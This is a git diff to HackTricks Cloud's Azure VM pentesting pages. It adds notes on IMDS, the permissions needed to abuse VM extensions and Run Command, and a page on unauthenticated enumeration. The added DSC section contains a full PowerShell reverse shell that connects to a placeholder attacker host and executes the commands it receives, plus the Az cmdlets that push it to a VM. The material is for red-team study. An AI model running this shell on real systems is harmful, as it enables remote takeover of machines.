+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/vms/README.md b/pentesting-cloud/azure-security/az-services/vms/README.md index 3ffd8d7b63..37663d1771 100644 --- a/pentesting-cloud/azure-security/az-services/vms/README.md +++ b/pentesting-cloud/azure-security/az-services/vms/README.md @@ -49,7 +49,7 @@ Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that * Data Disks IOPS Consumed Percentage is greater than 95% * OS IOPS Consumed Percentage is greater than 95% * Network in Total is greater than 500GB - * Network Out Toral is greater than 200GB + * Network Out Total is greater than 200GB * VmAvailabilityMetric is less than 1 * **Heath monitor**: By default check protocol HTTP in port 80 * **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock). @@ -131,6 +131,16 @@ az network bastion list -o table ``` {% endcode %} +## Metadata + +The Azure Instance Metadata Service (IMDS) **provides information about running virtual machine instances** to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via **REST API available at the non-routable IP address 169.254.169.254**, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication. + +Moreover, to contact the metadata endpoint, the HTTP request must have the header **`Metadata: true`** and must not have the header **`X-Forwarded-For`**. + +Check how to enumerate it in: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} + ## VM Enumeration {% tabs %} @@ -296,6 +306,8 @@ Azure VM extensions are small applications that provide **post-deployment config This would allow to **execute arbitrary code inside VMs**. +The required permission is **`Microsoft.Compute/virtualMachines/extensions/write`**. + It's possible to list all the available extensions with: ```bash @@ -396,9 +408,91 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na {% endtab %} {% endtabs %} +### Relevant VM extensions + +The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**. + +
+ +VMAccess extension + +This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} + +
+ +
+ +DesiredConfigurationState (DSC) + +This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: + +```powershell +# Content of revShell.ps1 +Configuration RevShellConfig { + Node localhost { + Script ReverseShell { + GetScript = { @{} } + SetScript = { + $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); + $stream = $client.GetStream(); + [byte[]]$bytes = 0..65535|%{0}; + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte, 0, $sendbyte.Length) + } + $client.Close() + } + TestScript = { return $false } + } + } +} +RevShellConfig -OutputPath .\Output + +# Upload config to blob +$resourceGroup = 'dscVmDemo' +$storageName = 'demostorage' +Publish-AzVMDscConfiguration ` + -ConfigurationPath .\revShell.ps1 ` + -ResourceGroupName $resourceGroup ` + -StorageAccountName $storageName ` + -Force + +# Apply DSC to VM and execute rev shell +$vmName = 'myVM' +Set-AzVMDscExtension ` + -Version '2.76' ` + -ResourceGroupName $resourceGroup ` + -VMName $vmName ` + -ArchiveStorageAccountName $storageName ` + -ArchiveBlobName 'revShell.ps1.zip' ` + -AutoUpdate ` + -ConfigurationName 'RevShellConfig' +``` + +
+ +
+ +Hybrid Runbook Worker + +This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-automation-account/). + +
+ ### VM Applications -These ara packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs. +These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs. {% code overflow="wrap" %} ```bash @@ -410,7 +504,7 @@ az sig gallery-application list --gallery-name --resource-group < ``` {% endcode %} -These are the paths were the applications get downloaded intide the file system: +These are the paths were the applications get downloaded inside the file system: * Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//` * Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\` @@ -418,11 +512,21 @@ These are the paths were the applications get downloaded intide the file system: Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli) {% hint style="danger" %} -It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting becase it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants. +It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants. {% endhint %} But there **isn't a "marketplace" for vm apps** like there is for extensions. +The permissions required are: + +* `Microsoft.Compute/galleries/applications/write` +* `Microsoft.Compute/galleries/applications/versions/write` +* `Microsoft.Compute/virtualMachines/write` +* `Microsoft.Network/networkInterfaces/join/action` +* `Microsoft.Compute/disks/write` + +Exploitation example to execute arbitrary commands: + {% tabs %} {% tab title="Linux" %} ```bash @@ -527,7 +631,7 @@ echo "Hello World" > /var/tmp/output.txt ### **Run Command** -This is the most basic mechanism Azure provides to execute arbitrary commands in VMs: +This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`. {% tabs %} {% tab title="Linux" %} @@ -574,40 +678,29 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt {% endtab %} {% endtabs %} -## **Run commands in a VM** - -### **AAD Login in VM** +## Privilege Escalation -It's possible to allow access to users authenticated via AzureAD. For example trying to access a **linux VM**: `ssh username@azure-corp.com@1.1.1.1` (it's important to **use the email** with the azurecorp used when trying to login) you could get an error like: - -{% code overflow="wrap" %} -``` -(username@azure-corp.com@1.1.1.1) This preview capability is not for production use. When you sign in, verify the name of the app on the sign-in screen is "Azure Linux VM Sign-in" and the IP address of the target VM is correct. - -To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DT4PNSTGR to authenticate. Press ENTER when ready. -``` -{% endcode %} - -Just **follow those instructions** going to [https://microsoft.com/devicelogin](https://microsoft.com/devicelogin) and indicating the code, use the email and password as credentials and you will be able to connect via SSH (if that user has enough permissions to do so: `Virtual Machine Administrator Login` or `Virtual Machine User Login` role). - -### DesiredConfigurationState (DSC) - -DesiredConfigurationState (DSC) is a PowerShell tool similar to Ansible, used for setting up a host through code. DSC integrates with Azure, allowing the upload of specific configuration files. These files must adhere to a strict syntax. Notably, the DSC extension in Azure can execute commands from files that meet certain formatting criteria, even if the syntax is not correct for DSC standards, as shown in the provided figure. - -The execution of these commands is facilitated by the [**`Publish-AzVMDscConfiguration`**](https://docs.microsoft.com/en-us/powershell/module/az.compute/publish-azvmdscconfiguration?view=azps-7.5.0) function in Az PowerShell. The requirements include a **.PS1** file with a defined function and the file must be zipped into a **.zip** file. Even though the syntax might not be accurate for DSC, the code will still execute. However, the extension will mark the execution status as "failure," and no output from the command will be visible due to the status being overwritten by the failure message. +{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %} +[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md) +{% endcontent-ref %} -### Hybrid Worker Groups (HWGs) in Azure +## Unauthenticated Access -[**Hybrid Worker Groups (HWGs)**](https://docs.microsoft.com/en-us/azure/automation/automation-hybrid-runbook-worker) are a feature in Azure that allow Runbooks, configured in an Automation Account, to be executed on an Azure Virtual Machine (VM) that is part of the designated HWG. This execution is facilitated through an extension installed on the VM, which deploys the Runbook code onto the VM. A significant aspect of this process is that the actual credentials are not a factor in execution because the code runs with elevated privileges, specifically as **SYSTEM** or root, as illustrated in the provided figure. +{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %} +[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) +{% endcontent-ref %} -A crucial detail for those utilizing Windows 10 VMs is the necessity to specify the PowerShell version for the Runbook. It should be set to run as PowerShell Version 5.1 instead of 7.1. This requirement stems from the fact that PowerShell 7.1 is not installed by default on these VMs, leading to a failure in script execution if version 7.1 is specified. +## Pot Exploitation -This feature of Azure offers a robust method for automating and managing tasks across hybrid environments, allowing for centralized management and execution of tasks on Azure VMs. +{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %} +[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md) +{% endcontent-ref %} ## References * [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview) * [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/) +* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service) {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md new file mode 100644 index 0000000000..2d7ddc48fb --- /dev/null +++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md @@ -0,0 +1,69 @@ +# Az - VMs Unath + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Virtual Machines + +For more info about Azure Virtual Machines check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### Exposed vulnerable service + +A network service that is vulnerable to some RCE. + +### Public Gallery Images + +A public image might have secrets inside of it: + +{% code overflow="wrap" %} +```bash +# List all community galleries +az sig list-community --output table + +# Search by publisherUri +az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']" +``` +{% endcode %} + +### Public Extensions + +This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it: + +```bash +# It takes some mins to run +az vm extension image list --output table + +# Get extensions by publisher +az vm extension image list --publisher "Site24x7" --output table +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %}